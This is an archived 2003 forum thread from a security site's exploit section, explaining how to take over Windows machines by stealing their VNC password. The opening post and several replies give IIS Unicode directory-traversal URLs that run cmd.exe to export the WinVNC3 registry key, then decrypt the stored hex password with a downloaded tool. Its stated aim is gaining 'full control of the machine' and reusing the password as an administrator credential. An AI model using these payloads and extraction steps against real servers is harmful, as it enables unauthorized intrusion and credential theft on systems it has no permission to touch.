Decrypt VNC password through vulnerabilities

Full Version: Decrypt VNC password through vulnerabilities

GovernmentSecurity.org > The Archives > Exploit Articles

Nikscap

May 14 2003, 03:18 PM

How to Decrypt VNC password through vulnerabilities, and gain full control of the machine ???

About 70 % of time the session was not locked and it's very easy to enter

and ~ 50 % of VNC password are the same to Administrator password ! ( or router, etc ... )

With this solution it's possible to take the hand several times where you did not have other solutions !!!

Don' t forget, Training like you fight

, let's go !

[1] - Unicode

Exctract the VNC key

CODE

.../winnt/system32/cmd.exe?/c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default

View the Key like this

CODE

../winnt/system32/cmd.exe?/c+type+c:\vnc.reg

Now we can show the password in hexa

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
blablabla.....blablabla.....
"Password"=hex:27,8a,e1,7c,28,3f,8e,b7
blablabla.....blablabla.....

for decrypt the pass wa have many solutions , but the more easy it's to download this tool :VNcon

Go to menu password --> Decrypt password --> Copy the password in hexa, and delete all the " , " characters like this 278ae17c283f8eb7 = toto

[2] - SQL, WebDav, etc ...

It's the same request ! ( but it's for finish the exemple ... )

CODE

regedit /e c:/vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default

And

CODE

Type c:/vnc.reg

# Warning ! The path for extract the key can change according to the version ( + OR - New), I write all the possibilies you can found !

CODE

A - HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
B - HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3
C - HKEY_USERS\.DEFAULT\SOFTWARE\ORL\WinVNC3

I hope this way my explaining it is clear !

Link about this : VNC use weak password protection mechanism

DJVASTVASTY2K

Dec 8 2003, 05:19 PM

How Does This Method Work ??

I Tryed The Commands But No Success

Please Can You Elaborate

Thank You

Best Regards

Adam

Vast Gsm

w00dy

Dec 8 2003, 05:48 PM

Its unicode, so the server must be vulnerable and must be ran in the brwoser.. IE

CODE

http://www.whateverserver.com/.../winnt/system32/cmd.exe?/c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default

Andy

Dec 9 2003, 12:38 AM

....as long as u have priviledge to viewing registry u can get vnc pass ez.

yuliang11

Dec 9 2003, 01:13 AM

this seems like a local exploits. what about vpn ? anyone knows anything about it

jeroen

Dec 9 2003, 09:16 AM

thanks for sharing man

this can be come handy sometimes

Flinston

Dec 13 2003, 08:47 AM

yeah this could me handy ... but you have to find IIS Unicode vulnerable MS Servers ...

Yorn

Dec 13 2003, 07:37 PM

Just get commandline access and run:

"regedit /e c:/vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3"

then view the contents of vnc.reg

actually, if you wanted to change it, you could change it to an encoded one that you already had on your machine.

Fantafour

Dec 13 2003, 07:43 PM

Anyone got a succesfull injection ?

still problems...

320X

Dec 15 2003, 12:44 AM

maybe it help´s you
http://www.securiteam.com/exploits/6S0040A6AW.html

VIXVVXIV

Dec 15 2003, 12:54 AM

thanks for sharing man

VIXVVXIV

tolf

Dec 15 2003, 01:26 AM

VNCPWDUMP..
http://www.securiteam.com/tools/5KP0F2A9QG.html

ganz2

Dec 15 2003, 03:53 AM

very cool

PuPPaFiSH

Dec 15 2003, 06:59 AM

Thx for the info fella, I'll check it out.

Orangey

Dec 15 2003, 11:32 PM

Yes, This is a Local Exploit. But useful if you forget your password

net_runner

Dec 16 2003, 03:12 PM

very interesting the combo iis+vnc, thankz

batigoooal

Dec 17 2003, 03:00 PM

another very usefull tools for decrypt vnc password is vncon :

http://vncon.chronetal.co.uk/

You put the crypted key in the software and he would decrypt password automaticly for you,

See ya,

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.